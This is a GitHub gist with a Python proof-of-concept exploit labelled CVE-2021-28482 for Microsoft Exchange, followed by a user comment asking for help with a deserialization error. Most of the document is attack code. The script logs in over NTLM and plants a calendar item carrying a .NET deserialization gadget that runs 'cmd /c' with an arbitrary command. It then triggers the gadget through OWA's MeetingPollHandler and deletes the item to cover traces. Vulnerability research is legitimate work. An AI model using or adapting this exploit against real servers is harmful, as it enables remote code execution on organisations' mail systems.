Created
May 2, 2021 11:10
-
-
Save testanull/9ebbd6830f7a501e35e67f2fcaa57bda to your computer and use it in GitHub Desktop.
PoC of CVE-2021-28482
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import time | |
import sys | |
from base64 import b64encode | |
from requests_ntlm2 import HttpNtlmAuth | |
from urllib3.exceptions import InsecureRequestWarning | |
from urllib import quote_plus | |
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) | |
target = "" | |
username = "john" | |
pwd = "" | |
cmd = "mspaint.exe" | |
def escape(_str): | |
_str = _str.replace("&", "&") | |
_str = _str.replace("<", "<") | |
_str = _str.replace(">", ">") | |
_str = _str.replace("\"", """) | |
return _str | |
payload2 = """ | |
<ArrayOfKeyValueOfstringProposeOptionsMeetingPollParametersE_S0982HC z:Id="1" z:Size="1" | |
xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays" | |
xmlns:i="http://www.w3.org/2001/XMLSchema-instance" | |
xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/"> | |
<KeyValueOfstringProposeOptionsMeetingPollParametersE_S0982HC> | |
<Key z:Id="2">ahihi</Key> | |
<Value z:Id="3" | |
xmlns:a="http://schemas.datacontract.org/2004/07/Microsoft.Exchange.Entities.DataModel.Calendaring.CustomActions"> | |
<ChangedProperties xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Exchange.Entities.DataModel" | |
xmlns:b="http://schemas.datacontract.org/2004/07/Microsoft.Exchange.Entities.DataModel.PropertyBags"> | |
<b:propertyValues z:Size="1" | |
xmlns:c="http://schemas.microsoft.com/2003/10/Serialization/Arrays"> | |
<c:KeyValueOfstringanyType> | |
<c:Key>asdasdasdasdasd</c:Key> | |
<c:Value"> | |
<ExpandedWrapperOfProcessObjectDataProviderpaO_SOqJL xmlns="http://schemas.datacontract.org/2004/07/System.Data.Services.Internal" | |
xmlns:c="http://www.w3.org/2001/XMLSchema" | |
xmlns:i="http://www.w3.org/2001/XMLSchema-instance" | |
xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/" | |
> | |
<root type="System.Data.Services.Internal.ExpandedWrapper`2[[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]],System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"> | |
<ExpandedWrapperOfProcessObjectDataProviderpaO_SOqJL xmlns="http://schemas.datacontract.org/2004/07/System.Data.Services.Internal" | |
xmlns:c="http://www.w3.org/2001/XMLSchema" | |
xmlns:i="http://www.w3.org/2001/XMLSchema-instance" | |
xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/" | |
> | |
<ExpandedElement z:Id="ref1" > | |
<__identity i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System"/> | |
</ExpandedElement> | |
<ProjectedProperty0 xmlns:a="http://schemas.datacontract.org/2004/07/System.Windows.Data"> | |
<a:MethodName>Start</a:MethodName> | |
<a:MethodParameters xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"> | |
<b:anyType i:type="c:string">cmd</b:anyType> | |
<b:anyType i:type="c:string">/c %s</b:anyType> | |
</a:MethodParameters> | |
<a:ObjectInstance z:Ref="ref1"/> | |
</ProjectedProperty0> | |
</ExpandedWrapperOfProcessObjectDataProviderpaO_SOqJL> | |
</root> | |
</c:Value> | |
</c:KeyValueOfstringanyType> | |
</b:propertyValues> | |
</ChangedProperties> | |
<OriginalTypeAssembly z:Id="12" i:nil="true" | |
xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Exchange.Entities.DataModel">Microsoft.Exchange.Entities.DataModel, Version=15.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35</OriginalTypeAssembly> | |
<OriginalTypeName z:Id="14" | |
xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Exchange.Entities.DataModel">Microsoft.Exchange.Entities.DataModel.Calendaring.CustomActions.ProposeOptionsMeetingPollParameters</OriginalTypeName> | |
</Value> | |
</KeyValueOfstringProposeOptionsMeetingPollParametersE_S0982HC> | |
</ArrayOfKeyValueOfstringProposeOptionsMeetingPollParametersE_S0982HC>""" % escape( | |
cmd) | |
payload2 = escape(payload2) | |
payload1 = """<?xml version="1.0" encoding="utf-8"?> | |
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" | |
xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" | |
xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" | |
xmlns:soap="http://www.w3.org/2003/05/soap-envelope"> | |
<soap:Header> | |
<t:RequestServerVersion Version="Exchange2016" /> | |
<t:TimeZoneContext> | |
<t:TimeZoneDefinition Name="(UTC-08:00) Pacific Time (US &amp; Canada)" Id="Pacific Standard Time"> | |
<t:Periods> | |
<t:Period Bias="P0DT8H0M0.0S" Name="Standard" Id="Std" /> | |
<t:Period Bias="P0DT7H0M0.0S" Name="Daylight" Id="Dlt/1" /> | |
<t:Period Bias="P0DT7H0M0.0S" Name="Daylight" Id="Dlt/2007" /> | |
</t:Periods> | |
<t:TransitionsGroups> | |
<t:TransitionsGroup Id="0"> | |
<t:RecurringDayTransition> | |
<t:To Kind="Period">Dlt/1</t:To> | |
<t:TimeOffset>P0DT2H0M0.0S</t:TimeOffset> | |
<t:Month>4</t:Month> | |
<t:DayOfWeek>Sunday</t:DayOfWeek> | |
<t:Occurrence>1</t:Occurrence> | |
</t:RecurringDayTransition> | |
<t:RecurringDayTransition> | |
<t:To Kind="Period">Std</t:To> | |
<t:TimeOffset>P0DT2H0M0.0S</t:TimeOffset> | |
<t:Month>10</t:Month> | |
<t:DayOfWeek>Sunday</t:DayOfWeek> | |
<t:Occurrence>-1</t:Occurrence> | |
</t:RecurringDayTransition> | |
</t:TransitionsGroup> | |
<t:TransitionsGroup Id="1"> | |
<t:RecurringDayTransition> | |
<t:To Kind="Period">Dlt/2007</t:To> | |
<t:TimeOffset>P0DT2H0M0.0S</t:TimeOffset> | |
<t:Month>3</t:Month> | |
<t:DayOfWeek>Sunday</t:DayOfWeek> | |
<t:Occurrence>2</t:Occurrence> | |
</t:RecurringDayTransition> | |
<t:RecurringDayTransition> | |
<t:To Kind="Period">Std</t:To> | |
<t:TimeOffset>P0DT2H0M0.0S</t:TimeOffset> | |
<t:Month>11</t:Month> | |
<t:DayOfWeek>Sunday</t:DayOfWeek> | |
<t:Occurrence>1</t:Occurrence> | |
</t:RecurringDayTransition> | |
</t:TransitionsGroup> | |
</t:TransitionsGroups> | |
<t:Transitions> | |
<t:Transition> | |
<t:To Kind="Group">0</t:To> | |
</t:Transition> | |
<t:AbsoluteDateTransition> | |
<t:To Kind="Group">1</t:To> | |
<t:DateTime>2007-01-01T08:00:00.000Z</t:DateTime> | |
</t:AbsoluteDateTransition> | |
</t:Transitions> | |
</t:TimeZoneDefinition> | |
</t:TimeZoneContext> | |
</soap:Header> | |
<soap:Body> | |
<m:CreateItem SendMeetingInvitations="SendToAllAndSaveCopy"> | |
<m:Items> | |
<t:CalendarItem> | |
<t:Subject>Weekly Update Meeting</t:Subject> | |
<t:ExtendedProperty> | |
<t:ExtendedFieldURI PropertySetId="11000e07-b51b-40d6-af21-caa85edab1d0" | |
PropertyName="MeetingPollProposeOptionsRequestsBlob" PropertyType="String" /> | |
<t:Value>%s</t:Value> | |
</t:ExtendedProperty> | |
<t:Body BodyType="HTML">Come hear about how the Organized Observational Paradigm SkyNet project is coming along!</t:Body> | |
<t:ReminderMinutesBeforeStart>30</t:ReminderMinutesBeforeStart> | |
<t:Start>2021-04-22T06:45:32.868-08:00</t:Start> | |
<t:End>2021-04-22T06:55:32.868-08:00</t:End> | |
<t:Location>Contoso Main Gallery</t:Location> | |
<t:RequiredAttendees> | |
<t:Attendee> | |
<t:Mailbox> | |
<t:EmailAddress>Administrator@evil.corp</t:EmailAddress> | |
</t:Mailbox> | |
</t:Attendee> | |
<t:Attendee> | |
<t:Mailbox> | |
<t:EmailAddress>john@evil.corp</t:EmailAddress> | |
</t:Mailbox> | |
</t:Attendee> | |
<t:Attendee> | |
<t:Mailbox> | |
<t:EmailAddress>mart@evil.corp</t:EmailAddress> | |
</t:Mailbox> | |
</t:Attendee> | |
</t:RequiredAttendees> | |
<t:Recurrence> | |
<t:DailyRecurrence> | |
<t:Interval>1</t:Interval> | |
</t:DailyRecurrence> | |
<t:NumberedRecurrence> | |
<t:StartDate>2021-04-22T06:45:32.868-08:00</t:StartDate> | |
<t:NumberOfOccurrences>2</t:NumberOfOccurrences> | |
</t:NumberedRecurrence> | |
</t:Recurrence> | |
</t:CalendarItem> | |
</m:Items> | |
</m:CreateItem> | |
</soap:Body> | |
</soap:Envelope> | |
""" % payload2 | |
res = requests.post("https://%s/ews/Exchange.asmx" % target, | |
data=payload1, | |
headers={ | |
"Content-type": "text/xml; charset=utf-8", | |
}, | |
verify=False, | |
auth=HttpNtlmAuth('%s' % (username), pwd)) | |
if res.status_code != 200: | |
print("error 1") | |
exit() | |
ct = res.content | |
item_id = ct.split('<t:ItemId Id="')[1].split('"')[0] | |
change_key = ct.split('ChangeKey="')[1].split('"')[0] | |
print "Attacking target %s with user %s" % (target, username) | |
print "Sending command cmd.exe /c %s" % cmd | |
session = requests.Session() | |
header = {"Cookie": "mkt=en-US"} | |
data = { | |
"destination": "https://%s/owa" % target, | |
"flags": "", | |
"username": username, | |
"password": pwd | |
} | |
res = session.post("https://%s/owa/auth.owa" % target, | |
headers=header, | |
data=data, | |
verify=False) | |
# print(res.status_code) | |
# print(res.headers) | |
cookie_obj = requests.cookies.create_cookie(domain=target, | |
name="mkt", | |
value="en-US") | |
session.cookies.set_cookie(cookie_obj) | |
owa_canary = session.cookies.get_dict()['X-OWA-CANARY'] | |
r1 = session.post( | |
"https://%s/owa/lang.owa" % target, | |
data= | |
"destination=%2Fowa%2F%3FbO%3D1&localeName=en-US&tzid=SE+Asia+Standard+Time&saveLanguageAndTimezone=1&X-OWA-CANARY=" | |
+ owa_canary, | |
headers={"Content-Type": "application/x-www-form-urlencoded"}, | |
verify=False, | |
allow_redirects=False) | |
r2 = session.get( | |
"https://%s/owa/MeetingPollHandler.ashx?PayloadType=ApproveProposedOptions&ItemId=OID.%s.2021/04/22&RequestId=123123123" | |
% (target, quote_plus(item_id)), | |
verify=False, | |
allow_redirects=False) | |
print "Attack successful!" | |
print "Cleaning up ..." | |
req_del = """<?xml version="1.0" encoding="utf-8"?> | |
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" | |
xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" | |
xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" | |
xmlns:soap="http://www.w3.org/2003/05/soap-envelope"> | |
<soap:Header> | |
<t:RequestServerVersion Version="Exchange2016" /> | |
<t:TimeZoneContext> | |
<t:TimeZoneDefinition Id="Pacific Standard Time" /> | |
</t:TimeZoneContext> | |
</soap:Header> | |
<soap:Body> | |
<m:DeleteItem DeleteType="MoveToDeletedItems" SendMeetingCancellations="SendToAllAndSaveCopy"> | |
<m:ItemIds> | |
<t:ItemId Id="%s" ChangeKey="%s" /> | |
</m:ItemIds> | |
</m:DeleteItem> | |
</soap:Body> | |
</soap:Envelope>""" % (item_id, change_key) | |
res = requests.post("https://%s/ews/Exchange.asmx" % target, | |
data=req_del, | |
headers={ | |
"Content-type": "text/xml; charset=utf-8", | |
}, | |
verify=False, | |
auth=HttpNtlmAuth('%s' % (username), pwd)) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
hii am getting a deserialization error while trying to run this poc
https://docs.microsoft.com/dotnet/framework/wcf/diagnostics/tracing/System-ServiceModel-Diagnostics-ThrowingExceptionThrowing an exception./LM/W3SVC/2/ROOT/owa-4-132654082330327318System.Runtime.Serialization.SerializationException, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089There was an error deserializing the object of type System.Collections.Generic.Dictionary
2[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[Microsoft.Exchange.Entities.DataModel.Calendaring.CustomActions.ProposeOptionsMeetingPollParameters, Microsoft.Exchange.Entities.DataModel, Version=15.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]]. Name cannot begin with the '"' character, hexadecimal value 0x22. Line 7, position 124.</Message><StackTrace> at System.Runtime.Serialization.XmlObjectSerializer.ReadObjectHandleExceptions(XmlReaderDelegator reader, Boolean verifyObjectName, DataContractResolver dataContractResolver) at System.Runtime.Serialization.XmlObjectSerializer.ReadObject(XmlDictionaryReader reader) at Microsoft.Exchange.Entities.Serialization.EntitySerializer.Deserialize[T](Stream stream) at Microsoft.Exchange.Entities.Serialization.EntitySerializer.Deserialize[T](String serializedObject) at Microsoft.Exchange.Entities.Calendaring.MeetingPoll.MeetingPollProposeOptionsPayload.GetRequests(IStoreSession mailboxSession) at Microsoft.Exchange.Entities.Calendaring.MeetingPoll.MeetingPollProposeOptionsPayload.ProcessRequest(IMailboxSession mailboxSession) at Microsoft.Exchange.Clients.Owa2.Server.Web.MeetingPollHandler.ProcessRequest(HttpContext context) at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute() at System.Web.HttpApplication.ExecuteStepImpl(IExecutionStep step) at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean&amp; completedSynchronously) at System.Web.HttpApplication.PipelineStepManager.ResumeSteps(Exception error) at System.Web.HttpApplication.BeginProcessRequestNotification(HttpContext context, AsyncCallback cb) at System.Web.HttpRuntime.ProcessRequestNotificationPrivate(IIS7WorkerRequest wr, HttpContext context) at System.Web.Hosting.PipelineRuntime.ProcessRequestNotificationHelper(IntPtr rootedObjectsPointer, IntPtr nativeRequestContext, IntPtr moduleData, Int32 flags) at System.Web.Hosting.PipelineRuntime.ProcessRequestNotification(IntPtr rootedObjectsPointer, IntPtr nativeRequestContext, IntPtr moduleData, Int32 flags) at System.Web.Hosting.UnsafeIISMethods.MgdIndicateCompletion(IntPtr pHandler, RequestNotificationStatus&amp; notificationStatus) at System.Web.Hosting.UnsafeIISMethods.MgdIndicateCompletion(IntPtr pHandler, RequestNotificationStatus&amp; notificationStatus) at System.Web.Hosting.PipelineRuntime.ProcessRequestNotificationHelper(IntPtr rootedObjectsPointer, IntPtr nativeRequestContext, IntPtr moduleData, Int32 flags) at System.Web.Hosting.PipelineRuntime.ProcessRequestNotification(IntPtr rootedObjectsPointer, IntPtr nativeRequestContext, IntPtr moduleData, Int32 flags) </StackTrace><ExceptionString>System.Runtime.Serialization.SerializationException: There was an error deserializing the object of type System.Collections.Generic.Dictionary
2[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[Microsoft.Exchange.Entities.DataModel.Calendaring.CustomActions.ProposeOptionsMeetingPollParameters, Microsoft.Exchange.Entities.DataModel, Version=15.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]]. Name cannot begin with the '"' character, hexadecimal value 0x22. Line 7, position 124. ---> System.Xml.XmlException: Name cannot begin with the '"' character, hexadecimal value 0x22. Line 7, position 124.any idea how i can resolve this?
i am running a exchange 2016 CU 19 with KB 5001402 installed.